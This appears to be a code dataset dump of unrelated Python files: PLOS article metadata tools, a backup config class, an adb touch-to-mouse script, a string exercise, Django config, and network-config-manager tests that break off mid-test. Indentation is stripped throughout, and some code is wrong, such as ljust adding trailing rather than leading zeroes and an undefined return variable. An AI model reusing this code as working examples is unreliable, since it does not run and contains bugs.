if missing_local_articles:
print('re-run plos_corpus.py to download latest {0} PLOS articles locally.'
.format(len(missing_local_articles)))
missing_solr_articles = set(local_articles) - set(solr_articles)
plos_articles = set(solr_articles + local_articles)
if missing_solr_articles:
print('\033[1m' + 'Articles that needs to be re-indexed on Solr:')
print('\033[0m' + '\n'.join(sorted(missing_solr_articles)))
return plos_articles
def get_random_list_of_dois(directory=None, count=100):
'''
Gets a list of random DOIs. Tries first to construct from local files in
directory, otherwise tries Solr DOI list as backup.
:param directory: defaults to get_corpus_dir()
:param count: specify how many DOIs are to be returned
:return: a list of random DOIs for analysis
'''
if directory is None:
directory = get_corpus_dir()
try:
article_list = listdir_nohidden(directory)
sample_file_list = random.sample(article_list, count)
sample_doi_list = [filename_to_doi(f) for f in sample_file_list]
except OSError:
doi_list = get_all_solr_dois()
sample_doi_list = random.sample(doi_list, count)
return sample_doi_list
def get_article_metadata(article_file, size='small'):
"""
For an individual article in the PLOS corpus, create a tuple of a set of metadata fields sbout that corpus.
Make it small, medium, or large depending on number of fields desired.
:param article_file: individual local PLOS XML article
:param size: small, medium or large, aka how many fields to return for each article
:return: tuple of metadata fields tuple, wrong_date_strings dict
"""
article = Article.from_filename(article_file)
doi = article.doi
filename = os.path.basename(article.filename).rstrip('.xml')
title = article.title
journal = article.journal
jats_article_type = article.type_
plos_article_type = article.plostype
dtd_version = article.dtd
dates = article.get_dates()
(pubdate, collection, received, accepted, revdate) = ('', '', '', '', '')
pubdate = article.pubdate
revdate = article.revdate
counts = article.counts
(fig_count, table_count, page_count) = ('', '', '')
body_word_count = article.word_count
related_articles = article.related_dois
abstract = article.abstract
try:
collection = dates['collection']
except KeyError:
pass
try:
received = dates['received']
except KeyError:
pass
try:
accepted = dates['accepted']
except KeyError:
pass
try:
fig_count = counts['fig-count']
except KeyError:
pass
try:
table_count = counts['table-count']
except KeyError:
pass
try:
page_count = counts['page-count']
except KeyError:
pass
metadata = [doi, filename, title, journal, jats_article_type, plos_article_type, dtd_version, pubdate, revdate, received,
accepted, collection, fig_count, table_count, page_count, body_word_count, related_articles, abstract]
metadata = tuple(metadata)
if len(metadata) == 18:
return metadata
else:
print('Error in {}: {} items'.format(article_file, len(metadata)))
return False
def get_corpus_metadata(article_list=None, directory=None):
"""
Run get_article_metadata() on a list of files, by default every file in directory
Includes a progress bar
TODO: this does not return a tuple, other parts of the code expect it to return a tuple, and its docs expect a tuple
:param article_list: list of articles to run it on
:return: list of tuples for each article; list of dicts for wrong date orders
"""
if directory is None:
directory = get_corpus_dir()
if article_list is None:
article_list = listdir_nohidden(directory)
corpus_metadata = []
for article_file in tqdm(article_list):
metadata = get_article_metadata(article_file)
corpus_metadata.append(metadata)
return corpus_metadata
def corpus_metadata_to_csv(corpus_metadata=None,
article_list=None,
wrong_dates=None,
csv_file='allofplos_metadata.csv',
directory=None
):
"""
Convert list of tuples from get_article_metadata to csv
:param corpus_metadata: the list of tuples, defaults to None
:param article_list: TODO: needs documentation, defaults to None
:param wrong_dates: TODO: needs documentation, defaults to None
:csv_file: string, TODO: needs more documentation, defaults to 'allofplos_metadata.csv'
:directory:
:return: None
"""
if directory is None:
directory = get_corpus_dir()
if corpus_metadata is None:
corpus_metadata, wrong_dates = get_corpus_metadata(article_list, directory=directory)
# write main metadata csv file
with open(csv_file, 'w') as out:
csv_out = csv.writer(out)
csv_out.writerow(['doi', 'filename', 'title', 'journal', 'jats_article_type', 'plos_article_type',
'dtd_version', 'pubdate', 'revdate', 'received', 'accepted', 'collection', 'fig_count', 'table_count',
'page_count', 'body_word_count', 'related_article', 'abstract'])
for row in corpus_metadata:
csv_out.writerow(row)
# write wrong dates csv file, with longest dict providing the keys
if wrong_dates:
keys = max(wrong_dates, key=len).keys()
with open('wrong_dates.csv', 'w') as out:
dict_writer = csv.DictWriter(out, keys)
dict_writer.writeheader()
dict_writer.writerows(wrong_dates)
def read_corpus_metadata_from_csv(csv_file='allofplos_metadata.csv'):
"""
reads in a csv of data, excluding the header row
:param csv_file: csv file of data, defaults to 'allofplos_metadata.csv'
:return: list of tuples of article metadata
"""
with open(csv_file, 'r') as csv_file:
reader = csv.reader(csv_file)
next(reader, None)
corpus_metadata = [tuple(line) for line in reader]
return corpus_metadata
def update_corpus_metadata_csv(csv_file='allofplos_metadata.csv', comparison_dois=None, directory=None):
"""
Incrementally update the metadata of PLOS articles in the csv file
:param csv_file: csv file of data, defaults to 'allofplos_metadata.csv'
:comparison_dois: list of DOIs to check whether their metadats is included
return updated corpus metadata
"""
if directory is None:
directory = get_corpus_dir()
# Step 1: get metadata and DOI list from existing csv file
try:
corpus_metadata = read_corpus_metadata_from_csv(csv_file)
csv_doi_list = [row[0] for row in corpus_metadata]
except FileNotFoundError:
corpus_metadata = []
csv_doi_list = []
# Step 2: compare DOI list with master list
if comparison_dois is None:
comparison_dois = get_all_solr_dois()
dois_needed_list = list(set(comparison_dois) - set(csv_doi_list))
# Step 3: compare to local file list
local_doi_list = [filename_to_doi(article_file) for article_file in listdir_nohidden(directory)]
files_needed_list = list(set(dois_needed_list) - set(local_doi_list))
if files_needed_list:
print('Local corpus must be updated before .csv metadata can be updated.\nUpdating local corpus now')
download_check_and_move(files_needed_list,
uncorrected_proofs_text_list,
tempdir=newarticledir,
destination=directory)
# Step 4: append new data to existing list
new_corpus_metadata, wrong_dates = get_corpus_metadata(article_list=dois_needed_list)
corpus_metadata.extend(new_corpus_metadata)
# Step 5: write new dataset to .csv
corpus_metadata_to_csv(corpus_metadata=corpus_metadata, csv_file='allofplos_metadata_updated.csv')
return corpus_metadata
|
python
|
import json
import jk_json
import jk_typing
import jk_prettyprintobj
from thaniya_common.cfg import CfgKeyValueDefinition
from thaniya_common.cfg import AbstractCfgComponent
from .BackupVolumeID import BackupVolumeID
class _Magic(AbstractCfgComponent):
MAGIC = "thaniya-volume-cfg"
__VALID_KEYS = [
CfgKeyValueDefinition("magic", str, False),
CfgKeyValueDefinition("version", int, False),
]
def __init__(self):
super().__init__(_Magic.__VALID_KEYS)
self._magic = _Magic.MAGIC # str
self._version = 1 # int
self._comment = "This file is part of the Thaniya backup volume management system! Please do not edit this file manually!"
#
#
class _DataV1(AbstractCfgComponent):
__VALID_KEYS = [
#CfgKeyValueDefinition("volumeGroup", str, False), # NOTE: for future implementation; not yet used
CfgKeyValueDefinition("volumeID", BackupVolumeID, False, BackupVolumeID.parseFromStr, str),
CfgKeyValueDefinition("backupBaseDirPath", str, True),
CfgKeyValueDefinition("isActive", bool, False),
]
def __init__(self):
super().__init__(_DataV1.__VALID_KEYS)
#self._volumeGroup = None # str # NOTE: for future implementation; not yet used
self._volumeID = None # BackupVolumeID
self._backupBaseDirPath = None # str
self._isActive = None # bool
#
#
#
# Represents the contents of a backup volume information file.
#
class BackupVolumeCfgFile(jk_prettyprintobj.DumpMixin):
################################################################################################################################
## Constructor Method
################################################################################################################################
def __init__(self):
self._magic = _Magic()
self._data = _DataV1()
#
################################################################################################################################
## Public Properties
################################################################################################################################
@property
def data(self) -> _DataV1:
return self._groups["data"]
#
################################################################################################################################
## Helper Methods
################################################################################################################################
def _dumpVarNames(self) -> list:
return [
"_magic",
"_data",
]
#
################################################################################################################################
## Public Methods
################################################################################################################################
def writeToFile(self, filePath:str):
assert isinstance(filePath, str)
jk_json.saveToFilePretty(self.toJSON(), filePath)
#
def toJSON(self) -> dict:
ret = {
"magic": self._magic.toJSON(),
"data": self._data.toJSON(),
}
return ret
#
def __str__(self):
return json.dumps(self.toJSON(), indent="\t", sort_keys=True)
#
@staticmethod
def loadFromFile(filePath:str):
assert isinstance(filePath, str)
jData = jk_json.loadFromFile(filePath)
return BackupVolumeCfgFile.loadFromJSON(jData)
#
@staticmethod
def loadFromJSON(jData:dict):
assert isinstance(jData, dict)
ret = BackupVolumeCfgFile()
ret._magic.loadFromJSON(jData["magic"])
assert ret._magic._magic == _Magic.MAGIC
assert ret._magic._version == 1
ret._data.loadFromJSON(jData["data"])
return ret
#
#
# Use this method to set a data value.
#
@jk_typing.checkFunctionSignature()
def setValue(self, name:str, value):
self._data.setValue(name, value)
#
#
# Use this method to read a data value.
#
@jk_typing.checkFunctionSignature()
def getValue(self, name:str):
return self._data.getValue(name)
#
#
|
python
|
import os
from threading import Thread
from sh import tail
from pymouse import PyMouse
from datetime import datetime, timedelta
import subprocess
WAS_MOVED_SCATTER = 0
# in seconds
SHORT_PRESS = .15
MEDIUM_PRESS = .4
LONG_PRESS = .6
VERY_LONG_PRESS = 1
SCROLL_SENSITIVITY = 10
MOVE_SENSITIVITY = .8
MOVE_SCALING = 1.4
def get_time_delta_in_microseconds(t1, t2):
if t1 == None or t2 == None:
return 666
t_d = t2 - t1
return t_d.seconds + t_d.microseconds / 10 ** 6
m = PyMouse()
cur_start_pos = list(m.position())
cur_anchor_x = None
cur_anchor_y = None
pre_x = None
pre_y = None
def wasnt_moved():
if cur_anchor_y == None and cur_anchor_x == None:
return True
return False
c_p = m.position()
print(cur_start_pos)
print(c_p)
d_x = abs(cur_start_pos[0] - c_p[0])
d_y = abs(cur_start_pos[1] - c_p[1])
return d_x < WAS_MOVED_SCATTER and d_y < WAS_MOVED_SCATTER
scroll_counter = 0
def scroll(val):
global scroll_counter
scroll_counter += val
if scroll_counter > SCROLL_SENSITIVITY:
while scroll_counter > SCROLL_SENSITIVITY:
scroll_counter -= SCROLL_SENSITIVITY
m.click((4))
elif scroll_counter < -SCROLL_SENSITIVITY:
while scroll_counter < -SCROLL_SENSITIVITY:
scroll_counter += SCROLL_SENSITIVITY
m.click((5))
# Thread(target = os.system, args = (adb_cmd, )).start()
horizontal = False
press_down_time = None
press_up_time = None
count_click = 0
count_hold = 0
is_holded = False
is_scrolled = False
is_stop = False
adb_cmd = 'adb shell getevent -l'.split()
# adb_cmd = 'adb shell getevent -l > event.log'
def sing(val):
return -1 if val < 0 else 1
def execute(cmd):
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)
for stdout_line in iter(popen.stdout.readline, ""):
yield stdout_line
popen.stdout.close()
return_code = popen.wait()
if return_code:
raise subprocess.CalledProcessError(return_code, cmd)
# Example
# for path in execute(["locate", "a"]):
# print(path, end="")
# runs forever
# for line in tail("-f", "event.log", _iter=True):
for line in execute(adb_cmd):
if not is_stop and (
'ABS_MT_POSITION_X' in line and horizontal or
'ABS_MT_POSITION_Y' in line and not horizontal):
unpress_time = get_time_delta_in_microseconds(
press_down_time, datetime.now()
)
if unpress_time > SHORT_PRESS:
count_click = 0
if (count_click == 1 and wasnt_moved() and not is_holded):
is_holded = True
m.press()
val = int(line.split()[3], 16)
if (pre_x != None):
d_x = val - pre_x
pre_x = val
else:
pre_x = val
if not is_scrolled:
continue
if not cur_anchor_x:
cur_anchor_x = val
elif not is_scrolled:
d_x = pow(abs(d_x) * MOVE_SENSITIVITY, MOVE_SCALING) * sing(d_x)
m.move_dx(round(d_x))
elif not is_stop and (
'ABS_MT_POSITION_Y' in line and horizontal or
'ABS_MT_POSITION_X' in line and not horizontal):
unpress_time = get_time_delta_in_microseconds(
press_down_time, datetime.now()
)
if unpress_time > SHORT_PRESS:
count_click = 0
if (count_click == 0 and wasnt_moved() and not is_holded and press_down_time != None):
press_time = get_time_delta_in_microseconds(
press_down_time, datetime.now()
)
if press_time > LONG_PRESS:
is_holded = True
m.press()
val = int(line.split()[3], 16)
if (pre_y != None):
d_y = val - pre_y
pre_y = val
else:
pre_y = val
continue
if not cur_anchor_y:
cur_anchor_y = val
elif is_scrolled:
scroll(d_y)
else:
rev = -1 if not horizontal else 1
d_y = pow(abs(d_y) * MOVE_SENSITIVITY, MOVE_SCALING) * sing(d_y) * rev
m.move_dy(round(d_y))
pre_y = val
elif 'BTN_TOUCH' in line:
cur_start_pos = list(m.position())
val = line.split()[3]
if val == 'UP':
if wasnt_moved() and not is_scrolled:
press_time = get_time_delta_in_microseconds(
press_down_time, datetime.now()
)
if press_time < SHORT_PRESS:
count_click += 1
elif not is_stop and press_time < MEDIUM_PRESS:
m.click(2)
else:
count_click = 0
if not is_stop and count_click == 1:
m.click()
if not is_stop and count_click == 2:
m.click()
elif count_click == 5:
is_stop = not is_stop
else:
count_click = 0
if is_holded:
is_holded = False
m.release()
is_scrolled = False
press_up_time = datetime.now()
press_down_time = None
else:
unpress_time = get_time_delta_in_microseconds(
press_up_time, datetime.now()
)
if unpress_time > SHORT_PRESS:
count_click = 0
if not horizontal and pre_x > 1600:
is_scrolled = True
press_down_time = datetime.now()
press_up_time = None
# count_hold += 1
# m.press()
cur_anchor_x = None
cur_anchor_y = None
elif 'ABS_MT_PRESSURE' in line:
pass
# print(line, end = '')
# print(line)
|
python
|
#Write a Python program to add leading zeroes to a string.
string = '5699'
print()
print(string.ljust(7, '0'))
|
python
|
from django.apps import AppConfig
class DbSearchConfig(AppConfig):
name = 'db_search'
|
python
|
import os
import shutil
import unittest
import pandas as pd
from python_tools.workflow_tools.qc.fingerprinting import (
read_csv,
plot_genotyping_matrix
)
class FingerprintingTestCase(unittest.TestCase):
def setUp(self):
"""
Set some constants used for testing
:return:
"""
# CD into this test module if running all tests together
if os.path.isdir('test__fingerprinting'):
os.chdir('test__fingerprinting')
# Set up test outputs directory
os.mkdir('./test_output')
def tearDown(self):
"""
Remove test outputs after each test
:return:
"""
shutil.rmtree('./test_output')
# Move back up to main test dir
os.chdir('..')
def test_plot_genotpying_matrix(self):
geno_compare = read_csv('./test_data/Geno_compare.txt')
title_file = pd.read_csv('./test_data/title_file.txt')
plot_genotyping_matrix(geno_compare, './test_output/', title_file)
if __name__ == '__main__':
unittest.main()
|
python
|
#!/usr/bin/python3
# SPDX-License-Identifier: Apache-2.0
# Copyright © 2020 VMware, Inc.
import os
import sys
import subprocess
import time
import shutil
import configparser
import pytest
import collections
import unittest
networkd_unit_file_path = '/etc/systemd/network'
network_config_manager_ci_path = '/run/network-config-manager-ci'
network_config_manager_ci_yaml_path = '/run/network-config-manager-ci/yaml'
network_config_manager_config_path = '/etc/network-config-manager'
network_config_manager_yaml_config_path = '/etc/network-config-manager/yaml'
network_config_manager_wpa_supplilant_conf_file = '/etc/network-config-manager/wpa_supplicant.conf'
units = ["10-test99.network",
"10-test98.network",
'10-test-99.network',
"10-wlan1.network",
"10-wlan0.network",
'10-test98.network',
'10-vlan-98.network',
'10-vlan-98.netdev',
'10-vlan-98.network',
'10-vxlan-98.network',
'10-vxlan-98.netdev',
'10-bridge-98.netdev',
'10-bridge-98.network',
'10-bond-98.netdev',
'10-bond-98.network'
'10-macvlan-98.netdev',
'10-macvlan-98.network'
'10-macvtap-98.netdev',
'10-macvtap-98.network'
'10-ipvlan-98.netdev',
'10-ipvtap-98.network',
'10-vrf-98.netdev',
'10-vrf-98.network',
'10-veth-98.netdev',
'10-veth-98.network'
'10-ipip-98.netdev',
'10-ipip-98.network'
'10-sit-98.netdev',
'10-sit-98.network'
'10-gre-98.netdev',
'10-gre-98.network'
'10-vti-98.netdev',
'10-vri-98.network'
'10-wg99.netdev',
'10-wg99.network']
def link_exits(link):
return os.path.exists(os.path.join('/sys/class/net', link))
def link_remove(link):
if os.path.exists(os.path.join('/sys/class/net', link)):
subprocess.call(['ip', 'link', 'del', 'dev', link])
def link_add_dummy(link):
subprocess.call(['ip', 'link', 'add', 'dev', link, 'type', 'dummy'])
def unit_exits(unit):
return os.path.exists(os.path.join(networkd_unit_file_path, unit))
def wifi_wpa_supplilant_conf_exits():
return os.path.exists(network_config_manager_wpa_supplilant_conf_file)
def remove_units_from_netword_unit_path():
for i in units:
if (os.path.exists(os.path.join(networkd_unit_file_path, i))):
os.remove(os.path.join(networkd_unit_file_path, i))
def restart_networkd():
subprocess.call(['systemctl', 'restart', 'systemd-networkd'])
subprocess.check_call(['sleep', '5'])
def dequote(s):
if len(s) < 2:
return v
s = s.replace('"', '')
return s
def read_wpa_supplicant_conf(conf_file):
networks = None
if not os.path.isfile(conf_file):
print("File path {} does not exist".format(conf_file))
return None
with open(conf_file) as fp:
for line in fp:
line = line.strip()
if not line or line.startswith('#'):
continue
if line.startswith('network'):
networks = collections.OrderedDict()
continue
if line.startswith('}'):
break
if (networks is None):
continue
x = line.split('=', 1)
k = x[0].strip()
v = dequote(x[1].strip())
networks[k] = v
return networks
class TestNetworkConfigManagerYAML:
yaml_configs = [
"dhcp.yaml",
"dhcp-client-identifier.yaml",
"network-section-dhcp-section.yaml",
"static-network.yaml",
"static-route-network.yaml",
]
def copy_yaml_file_to_netmanager_yaml_path(self, config_file):
shutil.copy(os.path.join(network_config_manager_ci_yaml_path, config_file), network_config_manager_yaml_config_path)
def remove_units_from_netmanager_yaml_path(self):
for config_file in self.yaml_configs:
if (os.path.exists(os.path.join(network_config_manager_yaml_config_path, config_file))):
os.remove(os.path.join(network_config_manager_yaml_config_path, config_file))
def setup_method(self):
link_remove('test99')
link_add_dummy('test99')
restart_networkd()
def teardown_method(self):
self.remove_units_from_netmanager_yaml_path()
remove_units_from_netword_unit_path()
def test_basic_dhcp(self):
self.copy_yaml_file_to_netmanager_yaml_path('dhcp.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
def test_dhcp_client_identifier(self):
self.copy_yaml_file_to_netmanager_yaml_path('dhcp-client-identifier.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(parser.get('DHCPv4', 'ClientIdentifier') == 'mac')
def test_network_and_dhcp4_section(self):
self.copy_yaml_file_to_netmanager_yaml_path('network-section-dhcp-section.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(parser.get('Network', 'LLDP') == 'yes')
assert(parser.get('Network', 'LinkLocalAddressing') == 'yes')
assert(parser.get('Network', 'IPv6AcceptRA') == 'yes')
assert(parser.get('DHCPv4', 'UseDNS') == 'yes')
assert(parser.get('DHCPv4', 'UseDomains') == 'yes')
assert(parser.get('DHCPv4', 'UseMTU') == 'yes')
assert(parser.get('DHCPv4', 'UseNTP') == 'yes')
def test_network_and_dhcp6_section(self):
self.copy_yaml_file_to_netmanager_yaml_path('network-section-dhcp6-section.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(parser.get('Network', 'LinkLocalAddressing') == 'yes')
assert(parser.get('Network', 'IPv6AcceptRA') == 'yes')
assert(parser.get('DHCPv6', 'UseDNS') == 'yes')
assert(parser.get('DHCPv6', 'UseNTP') == 'yes')
@pytest.mark.skip(reason="skipping")
def test_network_static_configuration(self):
self.copy_yaml_file_to_netmanager_yaml_path('static-network.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DNS') == "8.8.8.8 192.168.0.1")
assert(parser.get('Network', 'NTP') == "8.8.8.1 192.168.0.2")
assert(parser.get('Address', 'Address') == '192.168.1.45/24')
assert(parser.get('Route', 'Gateway') == '192.168.1.1/24')
assert(parser.get('Route', 'GatewayOnlink') == 'yes')
@pytest.mark.skip(reason="skipping")
def test_network_static_route_configuration(self):
self.copy_yaml_file_to_netmanager_yaml_path('static-route-network.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Address', 'Address') == '192.168.1.101/24')
assert(parser.get('Route', 'Gateway') == '9.0.0.1')
class TestKernelCommandLine:
def teardown_method(self):
remove_units_from_netword_unit_path()
@pytest.mark.skip(reason="skipping")
def test_network_kernel_command_line_ip_dhcp(self):
''' ip=<interface>:{dhcp|on|any|dhcp6|auto6} '''
subprocess.check_call(['nmctl', 'generate-config-from-cmdline', 'ip=test99:dhcp'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'ipv4')
@pytest.mark.skip(reason="skipping")
def test_network_kernel_command_line_multiple_ip_dhcp(self):
''' ip=<interface>:{dhcp|on|any|dhcp6|auto6} '''
subprocess.check_call(['nmctl', 'generate-config-from-cmdline', 'ip=test99:dhcp ip=test98:dhcp'])
assert(unit_exits('10-test99.network') == True)
assert(unit_exits('10-test98.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'ipv4')
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'DHCP') == 'ipv4')
@pytest.mark.skip(reason="skipping")
def test_network_kernel_command_line_ip_static(self):
''' ip=<client-IP>:[ <server-id>]:<gateway-IP>:<netmask>:<client_hostname>:<interface>:{none|off}'''
subprocess.check_call(['nmctl', 'generate-config-from-cmdline', 'ip=192.168.1.34::192.168.1.1:::test99:dhcp'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'ipv4')
assert(parser.get('Route', 'Gateway') == '192.168.1.1/32')
assert(parser.get('Address', 'Address') == '192.168.1.34')
class TestCLINetwork:
def setup_method(self):
link_remove('test99')
link_add_dummy('test99')
restart_networkd()
def teardown_method(self):
remove_units_from_netword_unit_path()
link_remove('test99')
def test_cli_set_mtu(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-mtu', 'test99', '1400'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Link', 'MTUBytes') == '1400')
def test_cli_set_mac(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-mac', 'test99', '00:0c:29:3a:bc:11'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Link', 'MACAddress') == '00:0c:29:3a:bc:11')
def test_cli_set_dhcp_type(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp-mode', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
def test_cli_set_dhcp_iaid(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp-mode', 'test99', 'ipv4'])
subprocess.check_call(['nmctl', 'set-dhcp-iaid', 'test99', '5555'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'IAID') == '5555')
def test_cli_add_static_address(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'add-link-address', 'test99', 'address', '192.168.1.45/24', 'peer',
'192.168.1.46/24', 'dad', 'ipv4', 'scope', 'link', 'pref-lifetime', 'forever',
'prefix-route', 'yes', 'label', '3434'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Address', 'Address') == '192.168.1.45/24')
assert(parser.get('Address', 'Peer') == '192.168.1.46/24')
assert(parser.get('Address', 'Scope') == 'link')
assert(parser.get('Address', 'PreferredLifetime') == 'forever')
assert(parser.get('Address', 'AddPrefixRoute') == 'yes')
assert(parser.get('Address', 'DuplicateAddressDetection') == 'ipv4')
assert(parser.get('Address', 'Label') == '3434')
def test_cli_add_default_gateway(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'add-link-address', 'test99', 'address', '192.168.1.45/24', 'peer',
'192.168.1.46/24', 'dad', 'ipv4', 'scope', 'link', 'pref-lifetime', 'forever',
'prefix-route', 'yes', 'label', '3434'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Address', 'Address') == '192.168.1.45/24')
subprocess.check_call(['nmctl', 'add-default-gateway', 'test99', 'gw', '192.168.1.1', 'onlink', 'true'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Route', 'Gateway') == '192.168.1.1')
assert(parser.get('Route', 'GatewayOnLink') == 'yes')
def test_cli_add_route(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'add-link-address', 'test99', 'address', '192.168.1.45/24', 'peer',
'192.168.1.46/24', 'dad', 'ipv4', 'scope', 'link', 'pref-lifetime', 'forever',
'prefix-route', 'yes', 'label', '3434'])
subprocess.check_call(['sleep', '5'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Address', 'Address') == '192.168.1.45/24')
subprocess.check_call(['nmctl', 'add-route', 'test99', 'gw', '192.168.1.1', 'dest', '192.168.1.2', 'metric', '111', 'scope',
'link', 'mtu', '1400', 'table', 'local', 'proto', 'static', 'type', 'unicast', 'onlink', 'yes', 'ipv6-pref',
'medium', 'src', '192.168.1.4'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Route', 'Destination') == '192.168.1.2')
assert(parser.get('Route', 'Gateway') == '192.168.1.1')
assert(parser.get('Route', 'GatewayOnLink') == 'yes')
assert(parser.get('Route', 'Metric') == '111')
assert(parser.get('Route', 'MTUBytes') == '1400')
assert(parser.get('Route', 'Protocol') == 'static')
assert(parser.get('Route', 'Scope') == 'link')
assert(parser.get('Route', 'Table') == 'local')
assert(parser.get('Route', 'IPv6Preference') == 'medium')
assert(parser.get('Route', 'Source') == '192.168.1.4')
def test_cli_add_routing_policy_rule(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'add-rule', 'test99', 'table', '10', 'to', '192.168.1.2/24', 'from', '192.168.1.3/24',
'oif', 'test99', 'iif', 'test99', 'tos','0x12'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('RoutingPolicyRule', 'Table') == '10')
assert(parser.get('RoutingPolicyRule', 'From') == '192.168.1.3/24')
assert(parser.get('RoutingPolicyRule', 'To') == '192.168.1.2/24')
assert(parser.get('RoutingPolicyRule', 'TypeOfService') == '0x12')
assert(parser.get('RoutingPolicyRule', 'OutgoingInterface') == 'test99')
assert(parser.get('RoutingPolicyRule', 'IncomingInterface') == 'test99')
def test_cli_add_dns(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '30'])
subprocess.check_call(['nmctl', 'add-dns', 'test99', '192.168.1.45', '192.168.1.46'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
def test_cli_add_domain(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'add-domain', 'test99', 'domain1', 'domain2'])
parser = configparser.ConfigParser()
